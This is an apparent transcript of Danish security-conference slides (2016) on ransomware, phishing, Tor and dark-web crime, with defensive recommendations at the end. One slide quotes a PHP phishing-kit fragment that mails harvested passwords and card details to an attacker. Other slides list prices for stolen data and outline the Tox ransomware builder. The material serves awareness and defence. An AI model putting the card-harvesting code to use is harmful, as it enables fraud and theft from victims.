jacob herbst
TRANSCRIPT
Hackernes mange muligheder - fokus på Ransomware og andre aktuelle angrebJacob Herbst, Chief Technology Officer, Dubex
Indlæg på DANSK IT’s konference It-sikkerhed 2016Torsdag den 4. februar 2016
Hackernes mange muligheder –fokus på Ransomware og andre aktuelle angrebJacob Herbst, CTO, Dubex A/S
Danst-IT, It-sikkerhed 2016, den 4. februar 2016
Dubex A/S
Managing risk –
Enabling growth
First mover
Største it-sikkerhedspartner i
Danmark
Selvfinansierende og privatejet siden
1997
Højt specialiserede it-sikkerheds-
eksperter
Eftertragtet arbejdsplads
Motiverede medarbejdere
Kvalitet
Service
Kompetence
Konsulent- og sikkerhedsydelser
lokalt og globalt
16. bedste
arbejdsplads i
Danmark
5. bedste IT-
arbejdsplads i
Danmark
Hvad skal vi have ud af dette indlæg?
• Mine mål med dette indlæg er at give svar på følgende:
• Hvad er trends og tendenser i forhold til angreb?
• Hvad driver de angreb som vi oplever?
• Et indblik i nogen af de metoder som hackerne anvender
• … og vil jeg (prøve) ikke tale om processer, standarder, cases, risikostyring osv…
• Disclaimer: Sikkerhed er et meget stort emneområde, som er i konstant forandring. I løbet af de næste 35 minutter, når vi højest at skrabe en lille smule i overfladen.
Agenda
Hvad er tendenser og drivere?
Hvordan virker et phishing angreb?
Hvad er Darkweb og hvad kan man finde der?
Hvad er fremtidsudsigterne?
Hvad vi kan gøre (kort)?
Angreb - aktuel status
• Målrettede angreb efter fortrolige informationer
• Industrispionage
• Økonomisk berigelseskriminalitet
• Tyveri af kreditkortinformation
• Internetsvindel
• Afpresning – Ransomware og DDoS
Mål
• Angreb, der omgår perimeterforsvaret
• Angreb mod brugere
• Social engineering angreb f.eks. phishing
• Angreb via sociale netværk
• Webbaserede angreb
• Indirekte angreb rettet mod klienter
• Indirekte angreb via betroede eksterne tredjeparter
• Angreb sløret i krypteret ssl-kommunikation
• Sårbarheder og avancerede dag-0-angreb
• Hurtig udnyttelse af sårbarheder
• Udnyttelse af ukendte sårbarheder – dag-0
• Unik og målrettet malware
Metoder
Angribere
AngrebKriminelle
Politiske
Spionage
KonkurrenterTerrorisme
Cyberkrig
Interne
Drivere bag cyberkriminalitet
AutomatiseringSamarbejde og
vidensdelingProfit
Anonymitet Betalingsinfrastruktur
Avancerede angreb er blevet det normale
• Mange målrettede angreb er stadig forholdsvis simple -- De fleste såkaldt avancerede angreb starter stadig med en e-mail sendt til den rette person med det rette indhold
• Cyber kriminalitet er en lukrativ forretning, og det er nemt at starte
• Undergrundsmiljø hvor de kriminelle handler med informationer
• Metoder som tidligere kun blev brugt i målrettede angreb anvendes nu af almindelige kriminelle
• Malware er blevet mere avanceret
Source: RSA/CNBC
How Industrial Hackers Monetize the Opportunity
Social Security $1
DDOS as a Service ~$7/hour
Credit Card Data $0.25-$60
Medical Record >$50
Bank Account Info >$1000 (depending on account type and balance)
Mobile Malware $150
Spam $50/500K emails
Exploits $1000-$300K
Malware Development $2500
Facebook Account with
15 friends
$1
Malware - Udviklingsproces
• Mange forskellige varianter af samme malware fremstilles automatisk forud for et angreb
• Kun varianter, der kommer igennem kvalitetstestningen (=omgår antivirus) bruges i selve angrebet
• De nye varianter frigives med jævne mellemrum for konstant at være foran antivirus mønster opdateringerne
Sløring og kvalitetstestning
Original Malware Permutationer Kvalitetstestning Deployering
Afvist hvis detekteretaf anti-virus software
Malware er vidt udbredt og kan fremstilles så det omgår
det traditionelle perimeterforsvar og anden beskyttelse
13.750
nye malware filer i timen
Cyber afpresning
• Cyber afpresning er online kriminalitet, der involverer et angreb eller trussel om angreb mod en person eller virksomhed, kombineret med et krav om betailing for at stoppe angrebet
• Cyber pengeafpresning kan ske på flere måde -kryptere data og holde den som gidsel, stjæle data og truende eksponering, nægte adgang til data, angribe systemer så de bliver utilgængelige
Cyber extorsion
DDos
Volumetric: Flooding
ComputationalAsymmetric: Consuming
CPU cycles
Stateful Asymmetric: Abusing memory
Vulnerability-based: Exploiting software
vulnerabilities
Blended DDoS: Combination of multiple
attack vectors
Ransomware
Encrytion Ransomware
Locker Ransomware
Blackmail
Release information
Dubex Security Analytics Center
• Overvågning af logfiler og alarmer fra bl.a.:
• Firewalls
• IDS/IPS systemer
• Webscanning
• Servere (Windows, Unix, databaser, web-servere, Active Directory m.m.)
• Lidt statistik fra 2015:
• Behandling af ”direkte” data fra over 10.000 enheder – indirekte fra mange flere via logs fra firewall, IDS/IPS m.m.
• Opsamling og analyse af mere end 12 billioner loglinjer / hændelser
• Manuel gennemgang af mere end 3,5 mio. korrelerende alarmer
• Over 500 kvalificerede alarmer sendt ud til vores kunder
Eksempel på phishing mail
• Slutbruger modtager phising mail med link til falsk
hjemmeside
• Siden er ”beskyttet” med CAPTCHA formentlig for at
beskytte mod automatisk analyse
Fil download
• Slutbrugeren downloader derefter automatisk en
ZIP fil der hedder ”forsendelse_20310.zip”
• Filen indeholder reelt en EXE fil, som har fået
tilknyttet et PDF logo for at ligne en PDF fil
Sandbox analyse
• Sandbox er en overvåget kopi af vores klient miljø, hvor malware kan køres og observeres, men vil ikke forårsage skade på selve systemet
• Sandbox bruges til dynamisk malwareanalyse og adfærd baseret detektion
Ransomware infektion
Infektion
Malwaredownloader
cryptomalware og data bliver krypteret
Besked om betaling af løsesum
inden udløb af deadline
Betaling af løsesum i
Bitcoins via TOR
TOR - Kombination af flere ”mixes”
• Målsætning: Etablering af en infrastruktur, der ikke er sårbar over for trafikanalyse
• Koncept: Kombination af mixes og proxies• Anvender public-key til etablering af forbindelser• Anvender symmetriske nøgler til kommunikation
• Samme koncept som kendes fra SSL/TLS proxies
• Anvendelse af flere mixes for at sikre et varieret netværk
• Mixes (blandere)
• Modtager krypteret input fra forskellige afsendere
• De-kryptering og videresendelse sker tilfældigt
• En iagttager kan ikke se, hvilket output der svarer til hvilket input
• Blot en enkelt server fungerer korrekt og ikke er kompromitteret vil anonymiteten være i behold
• Ulempe: Dyr og langsom public key kryptering
A
B
CA
B
C
B
C
A
A
C
B
Umuligt at
afgøre hvilken
meddelelse der
kommer fra
hvilken afsender
? ? ?
Anonymity & Transparently Routing Traffic Through Tor
Jacob
Keld
Pia
Peter
Ole
Ivan
Henrik
Gorm
Claus
Dorthe
ISPWorld
Wide
Web
Site
The Deep Web
Onion
Website
EXIT
NODE
ENTRY NODE
ENTRY NODE
ENTRY NODE
ENTRY
NODE
6-6500 relays and 3-3500 bridges/day and 1000 of these are also exit nodeshttps://metrics.torproject.org/
Behind the codes - Hackers hacking hackers..
$zaz = '[email protected]';
PSW : $theAccountPW
…
CardHolder : $chold
CardNumber : $cnum
ExpiryDate : $exp
CVC : $cvv
$subject = "RZ # $date # $time";
$headers = "From: VbV Full Info<[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
mail($zaz,$subject,$log,$headers);
TOX – Free Ransomware Toolkit
• 'Tox' Offers Free build-your-own Ransomware Malware Toolkit.
• Tox is completely free to use.
• One dark web hacker has released this for anyone to download and set up their own ransomware for free.
• Tox, which runs on TOR, requires not much technical skills to use.
• It is designed in such a way that almost anyone can easily deploy ransomware in three simple steps.
• Once a user register with the site, follow these three simple steps to creating your own malware:
• Type a desired ransom amount you want to ask victims for.
• Provide an additional note in the "Cause", the message that will alert victims that they are being held hostage to a piece of malware.
• Finally, you are prompted to fill out a captcha, and click "Create".
"This process creates an executable of about 2MB that is disguised as a
.scr file. Then the Tox [users] distribute and install as they see fit. The Tox
site (runs on the TOR network) will track the installs and profit. To withdraw
funds, you need only supply a receiving Bitcoin address.“
- McAfee explains..
Cryptolocker/CTB-Locker/CryptoWall etc..
Kilde: http://malware.dontneedcoffee.com
4.61299511 Bitcoins ~= 10.000DKK
Hvad er udviklingen omkring Ransomware?
• Aktuelle data viser, at næsten 70% af hændelser rammer små og mellemstore virksomheder, efterfulgt af store virksomheder og private – dog er der formentlig et stort antal mørke tal i statistikken
• Flere forskellige filtyper end tidligere bliver ramt – dette for at ramme flere samt ramme særlige filtyper med stor værdi for offeret – fx filer med gemte spil hos gamere og CAD-tegninger i en ingeniørvirksomhed eller tegnestue
• De fleste krypto-ransomware kalder sig CryptoLocker – simpelthen for at bruge det ”brand” navn som Cryptelocker har fået opbygget
• Nyeste Cryptolocker sletter Volule Shadow kopier (Windows indbyggede backup funktion), således at offeret ikke kan genskabe data den vej igennem
• Filnavne krypteres så det bliver mere vanskeligt at se hvad der er blevet krypteret. Unik krypteringsnøgle for hver fil
• Krypto-ransomware er gået "freemium." Afkod et par filer gratis for at overbevise ofrene om, at de rent faktisk får adgang til deres data, hvis de betaler
• ”Offline” kryptering dvs. krypteringen kan starte uden klienten har Internet adgang
• Krypto-ransomware er blevet mere virksomhedsrettet – tidligere var det primært rettet mod private, men nyere udgaver går efter ”professionelle” filtyper, netværksdrev (fx CryptoFortress) og kræver en højere løsesum
Aktuel status og tendenser
Ransomweb
• High-Tech Bridge:
• In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to “decrypt the database”. Web application in question was pretty simple and small, but very important for business of the company that could not afford to suspend it, neither to announce its compromise. Careful investigation that we performed revealed the following:
• The web application was compromised six months ago, several server scripts were modified to encrypt data before inserting it into the database, and to decrypt after getting data from the database. A sort of “on-fly” patching invisible to web application users.
• Only the most critical fields of the database tables were encrypted (probably not to impact web application performance a lot). All previously existing database records were encrypted accordingly.
• Encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems).
• During six months, hackers were silently waiting, while backups were being overwritten by the recent versions of the database.
• At the day X, hackers removed the key from the remote server. Database became unusable, website went out of service, and hackers demanded a ransom for the encryption key.
Ransomweb that encrypts websites and web servers RansomWeb: Crooks Start Encrypting
Websites And Demanding Thousands
Of Dollars From BusinessesThomas Fox-Brewster Jan 28, 2015 @ 07:36 AM
In another startling development in the world of cyber crime, malicious hackers have
started taking over website servers, encrypting the data on them and demanding
payment to unlock the files. A large European financial services company, whose
name was not disclosed, was the first known victim of this potentially business-
destroying attack, according to Swiss security firm High-Tech Bridge, which
investigated the breach in December 2014.
The security firm labelled the attack RansomWeb. The brazen techniques used and
the high ransom represent a more aggressive take on ransomware – malware which
encrypted people’s PCs and asked for payment, typically between $100 and £1,000.
Though only a handful of attacks have been seen, many expect such extortion to
grow rapidly in 2015. The initial attack started six months’ prior to the victim’s website
being shut down by the hackers, who were surreptitiously locking up the most critical
data on the server using “on-the-fly” tweaks to the site’s PHP code functions. The
criminals stored the key to decrypt the data on their own remote web server
accessible only via HTTPS encrypted communications, supposed to guarantee no
one with visibility on those connections could get access to the data but them. As
soon as they pulled the key and data was no longer being silently encrypted and
decrypted, the website was knocked out of action. That’s when employees at the
financial services firm were sent emails from a Gmail account, demanding the firm
pay $50,000 to get their website back. They threatened to increase the price by 10
per cent with every passing week.
http://www.forbes.com/sites/thomasbrewster/20
15/01/28/ransomweb-50000-dollar-extortion/
Hvad kan vi gøre? - Praktiske anbefalinger (1)
• Sikkerhed i dybden: Anvend forskellige og overlappende sikkerhedsforanstaltninger, så der beskyttes med single-point-of-failure i enkelte foranstaltninger eller teknologier
• Basale kontroller: Hold fokus på basale kontroller – husk den løbende opfølgning
• Overvågning: Mange organisationer opdager først brud på sikkerheden, når de får et opkald fra politiet eller en kunde. Overvågning af logfiler og change management kan give tidligere advarsel
• Antivirus er ikke nok: Antivirus fanger stadig mange angreb, men I oplever også mange angreb med unik malware og udnyttelse af dag-0-sårbarheder, som kræver andre værktøjer
• Endpointbeskyttelse: Endpoints skal beskyttes af mere end antivirus - husk opdateringer, begrænsede rettigheder, websikkerhed, device kontrol
• Patch straks: Angribere får ofte adgang ved hjælp af simple angrebsmetoder, som man kan beskytte sig mod med et opdateret og godt konfigureret it-miljø samt opdateret anti-virus
• Krypter følsomme data: Hvis data bliver tabt eller stjålet, er det meget sværere for en kriminel at misbruge
• Beskyt krypteringsnøgler: Hvis krypteringsnøglerne kompromitteres, kompromitteres sikkerheden også
• To-faktor-autentifikation: Dette vil ikke eliminere risikoen for, at passwords bliver stjålet, men det kan begrænse de skader, der kan ske ved misbrug af stjålne legitimationsoplysninger
Hvad kan vi gøre? - Praktiske anbefalinger (2)
• Mennesker: Awareness er stadig vigtigt. Undervis dine ansatte i vigtigheden af sikkerhed, hvordan man opdager et angreb, og hvad de skal gøre, når de ser noget mistænkeligt
• Hold adgangen til data på et ”need-to-know” niveau: Begræns adgangen til systemerne til det nødvendige personale. Sørg for, at have processer på plads til at lukke for adgangen igen, når folk skifter rolle eller job
• Husk fysisk sikkerhed: Ikke alle datatyverier sker online. Kriminelle vil manipulere med computere, betalingsterminaler eller stjæle dokumenter
• Backup: Hvis alle andre foranstaltninger fejler, kan en backup redde data. Husk beskyttelse af backup medierne…
• Incident response: Planlæg efter, at der vil ske hændelser - følg løbende op på hvordan, og hvor hurtigt, incidents opdages og håndteres, så reaktionen løbende kan forbedres
• Opfølgning: Glem ikke de basale kontroller. Hold fokus på bedre og hurtigere opdagelse gennem en blanding af mennesker, processer og teknologi
• Trusselsbilledet: Hold øje med trusselsbilledet for løbende at kunne tilpasse sikkerhedsløsningen. Husk at ”one-size fits all” ikke holder i virkeligheden
• Riskovurdering: Er du mål for egentlig spionage, så undervurder ikke vedholdenheden, ekspertisen og værktøjerne hos din modstander
Risikobegrænsning
• Risikoen kan ikke fjernes, kun begrænses
• Sikkerhed kan ikke købes som produkt
• Sikkerhed opnås ved en blanding af
• Procedure & ledelse (Management issues)
• Design, værktøjer og tekniske løsninger
• Løbende overvågning og vedligeholdelse
• Resultat: Formulering af sikkerhedspolitik og implementering af sikkerhedssystem
Hold dig opdateret
Besøg
www.dubex.dk www.dubex.dk/update/
Abonnér på Dubex’ nyhedsbrev
Deltag på Dubex’ arrangementer
http://www.dubex.dk/arrangementer/
Følg Dubex på LinkedIn & Twitter
www.linkedin.com/company/dubex-as
twitter.com/Dubex